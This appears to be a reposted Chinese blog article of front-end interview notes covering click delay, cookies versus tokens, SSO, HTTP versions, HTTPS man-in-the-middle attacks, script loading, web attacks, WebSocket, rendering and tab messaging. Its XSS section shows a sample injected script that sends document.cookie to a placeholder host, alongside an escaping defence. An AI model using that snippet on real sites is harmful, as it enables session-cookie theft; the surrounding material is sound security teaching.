当前位置:   article > 正文

前端面试拼图-知识广度

前端面试拼图-知识广度

摘要:最近,看了下慕课2周刷完n道面试题,记录并添加部分可参考的文档,如下...

1. 移动端H5 click有300ms延迟, 如何解决?

背景:double tap to zoom

        移动端H5中的300ms点击延迟问题通常是由浏览器的双击缩放(double tap to zoom)功能引起的,延迟是为了等待一段时间,以确定用户是否要进行双击缩放操作。

        解决方案:

  • 借助一些第三方库,例如FastClick
  • 监听touchStart和touchend事件(touchstart touchend 会先于click触发)
  • 使用自定义DOM事件模拟一个click实践
  • 使用CSS属性touch-action: manipulation,告知浏览器在用户点击时不进行双击缩放操作
  • 把默认的click事件(300ms之后触发)禁止掉;
  • 现代浏览器的改进:在HTML的<head>标签内添加以下meta标签可以禁用浏览器的缩放功能,进而减少点击延
<meta name="viewport" content="**width=device-width**, user-scalable=no">

        扩展:Retina 屏幕的1px像素,如何实现?

       1.  使用CSS的border-width和border-image属性:

  1. .one-pixel-border {
  2. border-width: 1px;
  3. border-style: solid;
  4. border-image: linear-gradient(to right, transparent 50%, #000 50%) 0 0 1 0 stretch;
  5. }

        这个方法利用了border-image属性将线条绘制为一个渐变图像,其中透明部分占据一半的宽度,而另一半是实际的1像素宽度。

       2.  使用 CSS::after伪元素和transform: scaleY()缩放:通过使用::after伪元素创建一个细线条,并利用transform: scaleY()进行纵向缩放,可以在 Retina 屏幕上实现清晰的细线效果。例如:

  1. .element::after {
  2. content: "";
  3. display: block;
  4. height: 1px;
  5. background-color: red;
  6. transform: scaleY(0.5);
  7. transform-origin: top left;
  8. }

        3.  使用JavaScript第三方库来简化实现过程。例如,使用border.js或类似的库可以更方便地在Retina屏幕上创建1像素的边框。

2. 网络请求中, token和cookie有什么区别?

        Token和Cookie都是在网络请求中用于身份验证和会话管理的机制

        cookie:

        HTTP无状态,每次请求都要带上cookie,以帮助识别身份;

        服务端也可以向客户端set-cookie,cookie大小通常限制4kb

        cookie默认有跨域限制:不可跨域共享、传递cookie

        cookie本地存储

        HTML5之前cookie常被用于本地存储,但大小有限;

        HTML5 之后推荐使用localStorage和sessionStorage

        现代浏览器开始禁止第三方cookie,即禁止网页引入的第三方JS设置cookie

        新增属性SameSite:Strict/Lax/None;值可以自己设置

        cookie和session

        cookie用于登录验证,存储用户标识(如userId);

        session在服务端,存储用户详细信息,和cookie信息一一对应

        cookie + session是常见登录验证解决方案

        token vs cookie

        cookie是HTTP规范,而token是自定义传递

        cookie会默认被浏览器存储,而token需要自己存储;

        token默认没有跨域限制

        JWT(JSON Web Token)

        前端发起登录,后端验证成功后,返回一个加密的token;

        前端自行存储这个token(其中包含了用户信息,机密了)

        之后访问服务端接口,都带着这个token,作为用户信息

        总结:

        cookie:HTTP标准;由跨域限制(默认跨域不共享,不传递);配合session使用;

        token:无标准;无跨域限制;一般用于JWT

        扩展:Session和JWT那个更好?

        Session:

        原理简单,易于学习;用户信息存储在服务端,可快速封禁某个用户。

        占用服务端内存,硬件成本高;多进程、多服务器时,不好同步—需要使用第三方缓存,如redis;默认有跨域限制

        JWT:

        不占用服务端内存;多进程、多服务器不受影响;

        用户信息存储在客户端,无法快速封禁某用户;万一服务端秘钥被泄露,则用户信息全部丢失(待商定);

        token体积一般大于cookie,会增加请求的数据量

        综上:如果有严格管理用户信息的要求(保密、快速封禁)推荐session;如没有特殊要求,则使用JWT(如初创期的网站),二者比较可参考

Cookie、Session和JWT-CSDN博客文章浏览阅读752次,点赞22次,收藏16次。JSON Web Tokens(缩写 JWT)是目前最流行的跨域认证解决方案[1],解决了Session验证资源消耗和扩展性差的缺点。其官网是:首先,JWT的组成包括三个部分 :Header部分:主要包括alg属性和typ属性。alg表示签名算法(algorithm),默认是HMAC SHA256(写成HS56);typ表示令牌(token)类型(type),JWT令牌统一写为JWT。),此处为:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9。https://blog.csdn.net/weixin_61933613/article/details/136382730?spm=1001.2014.3001.5502        扩展:如何实现SSO单点登录?

        基于cookie:

        cookie默认不可跨域共享,但是有些情况下可设置为共享;

        主域名相同,如www.baidu.com image.baidu.com

        设置cookie domain为主域名,即可共享cookie

        SSO 技术:

        主域名完全不同,则cookie无法共享

        可使用SSO的技术,SSO实现流程说明:

  1. 用户首次访问WebsiteA,由于WebsiteA未登录,用户校验失败会触发一个302的重定向请求 到 SSO服务器登录页面;
  2. 用户输入账户、密码进行登录认证后,把登录状态写入到SSO的Session中,浏览器也会写下SSO域下的Cookie;
  3. SSO登录系统完成后会生成一个ST(Service Ticket),然后将ST作为参数传递给WebsiteA,WebsiteA获取到ST后,向SSO服务发送请求,验证ST的有效性。验证通过后WebsiteA就将登录状态写到Session中,并设置WebsiteA域下的Cookie,这样跨域的单点登录就完成了。
  4. 当用户访问WebsiteB/WebsiteC时,发现WebsiteB/WebsiteC不是登录状态,就会跳转到SSO系统。此时SSO系统发现已经登录,会生成一个ST。并将这个ST作为参数传递给WebsiteB/WebsiteC,WebsiteB/WebsiteC后台访问SSO系统验证ST有效性,验证通过后WebsiteB/WebsiteC就将登录状态写到Session中,并设置WebsiteB/WebsiteC域下的Cookie,这样其他子系统不需要再次进行登录就可以访问了。

SSO单点登录更多内容可参考

如何实现单点登录 - 知乎一、是什么 单点登录(Single Sign On),简称为 SSO,是目前比较流行的企业业务整合的解决方案之一 SSO的定义是在多个应用系统中,用户只需要登录一次就可以访问所有相互信任的应用系统 SSO 一般都需要一个独立的…icon-default.png?t=N7T8https://zhuanlan.zhihu.com/p/607721795

3. HTTP 协议和UDP协议的区别?

        HTTP协议是应用层协议,TCP UDP协议是传输层协议,严格来说,应该拿TCP和UDP进行比较

        TCP协议:有连接(三次握手),有断开(四次挥手),稳定传输

        UDP协议:无连接,无断开,不稳定传输,但效率高,适用于如视频会议、语音通话

        总结:

        HTTP是应用层,TCP UDP是传输层

        TCP 有连接,有断开,稳定传输

        UDP无连接,无断开,不稳定传输,但效率高

        扩展:HTTP协议 1.0 1.1 2.0有什么区别?

        HTTP 1.0: 定义于1996年

        最基础的HTTP协议,支持基本的GET POST方法;

        每次请求/响应都会建立一个新的TCP连接,请求完成后立即关闭连接。

        HTTP 1.1:发布于1999

        新增缓存策略 cache-control E-tag等

        支持长连接Connection:keep-alive, 一个TCP连接传输多个请求和响应;

        断点续传,状态码206(分片上传每次206继续穿,完成状态码200)

        支持新的方法PUT DELETE等,可用于Restful API

        支持管线化,允许客户端发送多个请求而不等待响应,提高了并行性和性能

        注意:浏览器会逐个发送多个请求,但服务器必须按照客户端请求的先后顺序依次回送相应的结果,以保证客户端能够区分出每次请求的响应内容(HTTP管道化实际上把先进先出队列从客户端(请求队列)迁移到服务端(响应队列)),管线化技术存在各种各样的问题,实际很很多浏览器并不支持。

        HTTP 2.0:发布于2015

        引入了二进制分帧层,将数据拆分为更小的帧进行传输,并在客户端和服务器之间复用连接;

        可压缩header,减少体积;

        多路复用,一次TCP连接中可以多个HTTP并行请求,避免了头部阻塞问题;

        注:HTTP/1.1的头部阻塞(Head-of-Line Blocking)是指在使用持久连接(Keep-Alive)的情况下,由于TCP连接上同时只能处理一个请求/响应,而且请求和响应的顺序必须保持一致,导致后续的请求在前面的请求未完成时被阻塞的现象

        支持流量控制和服务器推送等新特性,提升了性能和用户体验

        注:HTTP/2.0中的服务器推送(Server Push)是一项重要的性能优化特性,它允许服务器在客户端请求资源之前主动推送相关的资源给客户端,以提高页面加载速度和性能。

4. 什么是HTTPS中间人攻击?如何预防?

        我们知道HTTP明文传输,HTTPS加密传输,但HTTPS也不是绝对安全的。这就是要介绍的HTTPS中间人攻击,它是一种恶意行为,攻击者插入自己作为“中间人”来拦截和篡改经过的加密通信数据。通常情况下,当用户与服务器之间建立HTTPS连接时,数据被加密以防止被窃听或篡改。然而,在中间人攻击中,攻击者可以在用户和服务器之间插入自己的恶意代理,使得用户和服务器认为他们正在直接通信,但实际上所有的数据都会经过攻击者的“中转”。

        中间人攻击实施需要攻击者需要用户数据在到达目标设备前,完成拦截步骤完全了解其所有的数据交换。拦截后,若连接是使用 HTTPS 协议即传递的数据用了 SSL / TLS 加密,这时还需要其他手段去解密用户数据。参考下文中的HTTPS传输建立的示意图,解密过程有两种实施方法:

  • SSL 劫持(伪造证书) 攻击者在 TLS 握手期间拦截到服务器返回的公钥(步骤3),将服务器的公钥替换为自己公钥并返回给客户端,这样攻击者就能用自己的私钥去解密用户数据,也可以用服务器公钥解密服务器数据。这种方式的攻击存在问题是可感知,客户端在校验证书过程中会提示证书错误;
  • SSL 剥离 攻击者拦截到用户到服务器的请求后,攻击者继续和服务器保持 HTTPS 连接,并与用户降级为不安全的 HTTP 连接。

        中间人攻击 - 黑客伪造证书

        预防:

        用可信的第三方 CA 厂商,不下载来源不明的证书;

        尽可能使用 HTTPS 链接,开启 HSTS 策略

        避免连接不知名的 WiFi 热点,公共网络不进行涉及敏感信息的交互

        不忽略不安全的浏览器通知;

        注: 通过开启 HSTS(HTTP Strict Transport Security)策略,告知浏览器必须使用 HTTPS 连接。但是有个缺点是用户首次访问时因还未收到 HSTS 响应头而不受保护

5. <script> defer 和async有什么区别?

        首先,明确defer和aysnc都是用来控制脚本的加载和执行方式的,参考下图HTML解析遇到Script标签:

        无设置:HTML暂停解析,下载JS,执行JS,再继续解析HTML;

        defer:HTML继续解析,并行(异步)下载JS,HTML解析完再执行JS;

        async: HTML继续解析,并行下载JS,下载完成暂停HTML解析,立即执行JS,执行玩JS再解析HTML

        总结:

        defer 保证脚本的执行在文档解析完成后、DOMContentLoaded 事件触发前,且按照文档中出现的顺序执行;

        async 允许脚本的异步加载和执行,不阻塞文档的解析,但执行顺序不固定(加载完就执行);

        JS的执行一定和HTML解析是相互斥的,JS是单线程的。

        扩展: prefetch和dns-prefetch有什么区别?

        preload和prefetch

        preload资源在当前页面使用,会优先加载

        prefetch资源在未来页面使用(未打开),空闲时加载

  1. <head>
  2. <!--preload 当前页面使用-->
  3. <link rel="preload" href="style.css" as="style">
  4. <link rel="preload" href="main.js" as="script">
  5. <!--prefetch 未来页面使用-->
  6. <link rel="prefetch" href="other.js" as="script">
  7. <!--引用css-->
  8. <link rel="stylesheet" href="style.css">
  9. </head>
  10. <body>
  11. <!--引用 js-->
  12. <script src="main.js" defer></script>
  13. </body>

        dns-prefetch 和preconnect

        dns-prefetch 即DNS预查询,以便更快地建立连接和加载资源

        preconnect即DNS预连接

  1. <head>
  2. <link rel="dns-prefetch" href="https://fonts.gstatic.com/">
  3. <link rel="preconnect" href="https://fonts.gstatic.com/" crossorgin>
  4. </head>

        总结:

        prefetch是资源获取(和preload有关)

        dns-prefetch是DNS预查询(和preconnect相关)

6. 你知道那些前端攻击?该如何预防?

        XSS(Cross Site Script) 跨站脚本攻击

        原理:是指攻击者利用网站漏洞将代码注入到其他用户浏览器的攻击方式。通常分为反射性、存储型和DOM型。

前端安全 | HZFE - 剑指前端 Offer相关问题icon-default.png?t=N7T8https://febook.hzfe.org/awesome-interview/book1/network-security

        手段:虽然不同类型实现手段有些区别,但黑客都是将JS代码插入到网页内容中,渲染时执行JS代码

        预防:

        对于外部传入的内容进行充分转义(前端或者后端);

        设置 Cookie httpOnly 属性,禁止 JavaScript 读取 Cookie 防止被窃取;

        开启 CSP(Content Security Policy,内容安全策略),规定客户端哪些外部资源可以加载和执行,降低 XSS 风险。

  1. <!-- 通过就是脚本获取并传输cookie-->
  2. <div>
  3. <p>DEMO</p>
  4. <script>
  5. var img = document.createElement('image')
  6. img.src = 'https://xxx.com/api/xxx?cookie=' + document.cookie
  7. </script>
  8. </div>
  9. // 预防:
  10. <script>
  11. const str=`<p>DEMO</p>
  12. <script>
  13. var img = document.createElement('image')
  14. img.src = 'https://xxx.com/api/xxx?cookie=' + document.cookie
  15. </script>`
  16. const newStr = str.replaceAll('<', '&lt;').replaceAll('>', '&gt;')
  17. </script>

        注:Vue和React 默认可以屏蔽XSS攻击,除了Vue中的v-html和React中的dangerouslySetInnerHTML。

        CSRF(Cross Site Request Forgery)跨站请求伪造

        原理:攻击者诱导受害者进入第三方网站,在第三方网站中向被攻击网站发送跨站请求。利用受害者在被攻击网站已经获取的身份凭证,达到冒充用户对被攻击的网站执行某项操作的目的。

        手段:黑客诱导用户去访问另一个网站的接口,冒用用户身份伪造请求

        预防:严格的跨域限制+验证码机制

        详细过程:

        用户登陆了A网站,有了cookie

        黑客诱导用户到B网站,并发起A网站的请求(前提是用户在A网站已登录)

        A网站的API发现有cookie,认为是用户自己操作的

        预防手段:

        严格的跨域请求限制,如判断referrer(请求来源),仅仅允许安全域名请求;

        为cookie设置SameSite,限制第三方 Cookie 的使用,可选值有 Strict(完全禁止)、Lax(只允许链接、预加载请求和 GET 表单的场景下发送第三方 Cookie)、None(关闭 SameSite 属性);

        关键接口使用验证码,进行二次确认

        点击劫持 Click Jacking

        原理: 攻击者通过将一个或多个透明的、可见但被隐藏的层覆盖在网页上,诱导用户在点击看似正常的元素时,实际上触发了攻击者预设的恶意操作。

        手段: 诱导界面蒙上一个透明的iframe,诱导用户点击

        预防:

        让iframe不能跨域加载;

        判断iframe的域名是否一致,X-Frame-Options设置为sameorigin,只允许相同域名下的网页iframe;

        X-Frame-Option设置为sameorigin,浏览器会拒绝加载来自不同源(origin)页面的 iframe。具体来说,"sameorigin" 选项指示浏览器只允许相同源的页面嵌入当前页面的 iframe 中,而拒绝来自不同源的页面的嵌入。

        例如,如果网站 A 设置了 "X-Frame-Options: sameorigin",那么网站 B 就无法通过 iframe 将网站 A 的内容嵌入到自己的页面中。这可以有效地防止点击劫持攻击,因为攻击者无法通过 iframe 技术将目标网站的内容嵌入到恶意网页中,从而欺骗用户进行操作。

        值得注意的是,"X-Frame-Options" 头部已经被新的 CSP(Content Security Policy)头部所取代,CSP 提供了更多的安全选项,并且可以包含类似 X-Frame-Options 功能的功能。

        总的来说,"X-Frame-Options: sameorigin" 是一种简单但有效的安全机制,用于保护网站免受点击劫持攻击。

        注: 相对于XSS和CSRF,需要与用户进行交互,实施攻击的成本较高,在网络犯罪中比较少见;但仍可能被利用于钓鱼、欺诈和广告作弊等方面。

        DDoS:Distribute denial-of-service分布式拒绝服务

        原理:通过大规模 Internet 流量淹没目标服务器或其周边基础设施以破坏目标服务器、服务或网络正常流量的恶意行为。

        手段:分布式的、大规模的流量访问,使服务器瘫痪

        预防:软件层不好做,需要硬件预防(如阿里云的WAF)

        SQL注入

        原理; 攻击者在向数据库服务器发送查询请求时,会在查询语句中添加恶意代码,从而对服务器造成损害;

        手段:黑客提交内容时写入SQL语句,破坏数据库

        预防:验证输入,白名单验证参数是否符合所期望的类型、长度、大小和格式;处理输入的内容,替换特殊字符

        中间人攻击(MITM)(参考问题4)

7. WebSocket和HTTP协议有什么区别?

        WebSocket

        支持端到端通讯,可以由client发起,也可以由Server发起

        用于:消息通知,直播间讨论、聊天室、协同编辑

        WebSocket连接过程:先发起一个HTTP请求,成功后再升级到WebSocket协议,再通讯;

        WebSocket和HTTP区别

        http 是无状态的单向连接,WebSocket协议名是ws://,可双端发起请求;

        WebSocket没有跨域限制

        HTTP 是基于文本的协议,WebSocket 是基于帧的协议;

        通过send和onmessage通讯(HTTP通过req和res)

        扩展1:ws可升级为wss(类似https)

  1. // 导入了createServer函数, 用于创建一个 HTTP 或 HTTPS 服务器
  2. import {createServer} from 'https'
  3. // 从 Node.js中的fs模块中导入了readFileSync函数, 用于同步地读取文件的内容。
  4. import {readFileSync} from 'fs'
  5. // 从第三方库ws中导入了WebSocketServer类, 用于创建 WebSocket 服务器
  6. import {WebSocketServer} from 'ws'
  7. // 调用了createServer函数来创建一个服务器实例,使用了对象字面量作为参数,包含了证书和密钥的信息
  8. const server = createServer({
  9. cert: 'readFileSync(/path/to/cert.pem)',
  10. key: 'readFileSync(/path/to/key.pem)'
  11. })
  12. // 创建新的WebSocket服务器实例wss,并将之前创建的server实例传递给它
  13. const wss = new WebSocketServer({server})

        扩展2:实际项目中推荐使用socket.io,API更整洁

  1. io.on('connection', socket => {
  2. // emit an event to the socket
  3. socket.emit('request', /*...*/)
  4. // emit an event to all connected sockets
  5. io.emit('brocast', /*....*/)
  6. // listen to the event
  7. socket.on('reply', () => {/*....*/})
  8. })

        扩展4:WebSocket和HTTP长轮询的区别

        HTTP长轮询:客户端发起请求,服务端阻塞(等待),不会立即返回

        WebSocke: 客户端可以发起请求,服务端也可以发起请求

        注意:HTTP长轮询,需要处理timeout,即timeout之后重新发送请求

8. 描述从输入URL到页面展示的完整过程

        步骤如下:

        网络请求:

        DNS查询(得到IP),建立TCP连接(三次握手)

        浏览器发起HTTP请求

        收到请求响应,得到HTML源代码

        解析:

        解析HTML过程中,遇到静态资源还会继续发起网络请求,获取静态资源JS、CSS、图片、视频等;

        注意:静态资源可能有强缓存,此时不必再请求;

        解析:字符串 →结构化数据

  • HTML构建DOM树
  • CSS构建CSSOM树(style tree)
  • 两者结合,形成render tree

        扩展:优化解析的方式

        CSS放在<head>中,不要异步加载CSS

        JS放在<body>最下面(或合理使用defer async)

        <img>提前定义width height

        渲染:Render Tree绘制到页面上

        计算各个DOM的尺寸、定位,最后绘制页面

        遇到JS可能会执行(参考defer async)

        异步CSS、图片加载,可能会触发重新渲染

        扩展1:重绘repaint 重排reflow有什么区别?

        动态网页,随时都会重绘和重排

        重绘 通常是元素外观改变,如颜色、背景色,但元素的尺寸、定位不变,不会影响其他元素的位置;

        重排 重新计算尺寸和布局,可能会影响其他元素的位置,如元素高度增加,可能会使相邻元素位置下移

        区别:重排比重绘要影响更大,消耗也更大,尽量避免无意义的重排;

        减少重排的方法:

        集中修改样式,或直接切换css class

        修改之前先设置display:none,脱离文档流

        使用BFC特性,不影响其他元素位置

        频繁触发(resize scroll)使用节流和防抖

        使用createDocumentFragment批量操作DOM

        优化动画,使用CSS3和requestAnimationFrame

        扩展2:BFC Block Format Context块级格式化上下文

        BFC内部的元素无论如何改动,都不会影响其他元素的位置,触发BFC的条件:

        根节点<html>

        float的值为left/right

        overflow值为auto/scroll/hidden

        display值为inline-block/table/table-row/table-cell

        display: flex/grid的直接子元素

        position: absolute/fixed;

9. 如何实现网页多标签通讯?

        使用WebSocket

        无跨域限制;全双工通信;保持连接状态

        需要服务端支持,成本高

        使用localStorage(简单易用,推荐)

        同域的A和B两(多)个页面(localStorage跨域不共享);将数据长期存储在浏览器;提供事件storage监听变化

        A页面设置localStorage

        B页面可监听到localStorage值的修改

  1. window.addEventListener('storage', (e) => {
  2. console.log("localStorage变化的事件触发了;", e)
  3. })

        通过SharedWorker通讯(不兼容IE11)

        SharedWorker是WebWorker的一种

        WebWorker可开启子进程执行JS,但是不能操作DOM

        SharedWorker可以单独开启一个进程,用于同域页面通讯(跨域不共享)

  1. worker.js
  2. /**
  3. * for SharedWorker
  4. */
  5. const set = new Set() // set 用来存储连接的端口对象
  6. // 当有新连接建立时,onconnect事件被触发,获取连接的端口对象port,并将其加入 set 中
  7. onconnect = event => {
  8. const port = event.ports[0]
  9. set.add(port)
  10. // 设置port的onmessage事件监听器,用于接收消息
  11. port.onmessage = e => {
  12. // 遍历set中的端口对象,对除了自己以外的其他端口对象发送相同的消息,实现消息的广播
  13. set.forEach(p => {
  14. if(p === port) return //不给自己广播
  15. p.postMessage(e.data)
  16. })
  17. }
  18. // 向当前端口对象发送消息 'worker.js done'
  19. **port.postMessage**('worker.js done')
  20. }
  21. // page: detail
  22. <script>
  23. // 创建worker实例
  24. const worker = new SharedWorker('./worker.js')
  25. const tn1 = document.getElementById('btn')
  26. btn1.addEventListener('click', () => {
  27. console.log('click')
  28. worker.port.postMessage('detail go...') // 向 SharedWorker 发送消息
  29. })
  30. </script>
  31. // page: list
  32. <script>
  33. const worker = new SharedWorker('./worker.js')
  34. worket.port.onmessage = e => console.info('list', e.data) // 处理从 SharedWorker 接收到的数据
  35. </script>

        使用SharedWorker前要查看兼容问题:"sharedworker" | Can I use... Support tables for HTML5, CSS3, etcicon-default.png?t=N7T8https://caniuse.com/?search=sharedworkerWeb Worker 使用教程

Web Worker 使用教程 - 阮一峰的网络日志icon-default.png?t=N7T8https://www.ruanyifeng.com/blog/2018/07/web-worker.html        扩展: 网页和iframe如何通讯?

        可使用postMessage通讯,需要注意跨域的限制和判断

  1. <!--index.html-->
  2. <body>
  3. <p>index page <button id="btn1">发送消息</button> </p>
  4. </iframe id="iframe1" src="./child.html"></iframe>
  5. <script>
  6. const btn1 = document.getElementById('btn1')
  7. btnq.addEventListener('click', () => {
  8. console.info('index clicked')
  9. window.iframe1.contentWindow.postMessage('hello', '*')
  10. })
  11. window.addEventListener('message', event => {
  12. console.info('origin', event.origin) //来源的域名
  13. console.info('index received', event.data)
  14. })
  15. </script>
  16. </body>
  17. <!--child.html-->
  18. <body>
  19. <p>child page <button id="btn1">发送消息</button> </p>
  20. <script>
  21. const btn1 = document.getElementById('btn1')
  22. btnq.addEventListener('click', () => {
  23. console.info('child clicked')
  24. window.parent.postMessage('world','*')
  25. })
  26. window.addEventListener('message', event => {
  27. console.info('origin', event.origin) //来源的域名,判断来源的合法性
  28. console.info('child received', event.data)
  29. })
  30. </script>
  31. </body>

10. 请描述koa2的洋葱圈模型

        Koa2:一个简约、流行的node.js框架

        Koa2 的洋葱圈模型是一种中间件执行流程的设计模式,用于处理 HTTP 请求和响应。它被称为洋葱圈,因为中间件的执行顺序类似于剥洋葱一样,先从外层中间件开始执行,然后逐层向内执行,最后再逐层返回。

        洋葱圈模型的主要思想是将中间件按照一定的顺序组织起来,并且每个中间件可以在请求和响应的过程中执行相应的操作。整个流程中,请求会从外层中间件开始,逐层传递到内层中间件,然后再逐层返回,直到最外层的中间件处理完毕。

        在 Koa2 中,每个中间件都是一个异步函数(async function),它们接收两个参数:context(上下文对象)和 next(下一个中间件函数)。通过调用 await next() 来执行下一个中间件,这也是洋葱圈模型的关键之处。

官网地址:

Koa (koajs) -- 基于 Node.js 平台的下一代 web 开发框架 | Koajs 中文文档Koa (koajs) 是一个新的 web 框架,由 Express 幕后的原班人马打造,致力于成为 web 应用和 API 开发领域中的一个更小、更富有表现力、更健壮的基石。通过利用 async 函数,Koa 帮你丢弃回调函数,并有力地增强错误处理。Koa 并没有捆绑任何中间件,而是提供了一套优雅的方法,帮助您快速而愉快地编写服务端应用程序。icon-default.png?t=N7T8https://koa.bootcss.com/

  1. const Koa = require('koa'); // 引入Koa框架模块,创建一个 Koa 应用
  2. const app = new Koa(); // 创建一个Koa应用实例 app
  3. // logger
  4. app.use(async (ctx, next) => {
  5. await next(); // 先执行下一步x-response-time,执行完再继续执行
  6. const rt = ctx.response.get('X-Response-Time');
  7. console.log(`${ctx.method} ${ctx.url} - ${rt}`);
  8. });
  9. // x-response-time
  10. app.use(async (ctx, next) => {
  11. const start = Date.now();
  12. await next(); // 先执行下一步response,执行完再继续执行
  13. const ms = Date.now() - start; // response返回的执行时间
  14. ctx.set('X-Response-Time', `${ms}ms`);
  15. });
  16. // response
  17. app.use(async ctx => {
  18. ctx.body = 'Hello World';
  19. });
  20. app.listen(3000);

声明:本文内容由网友自发贡献,转载请注明出处:【wpsshop博客】
推荐阅读
相关标签
  

闽ICP备14008679号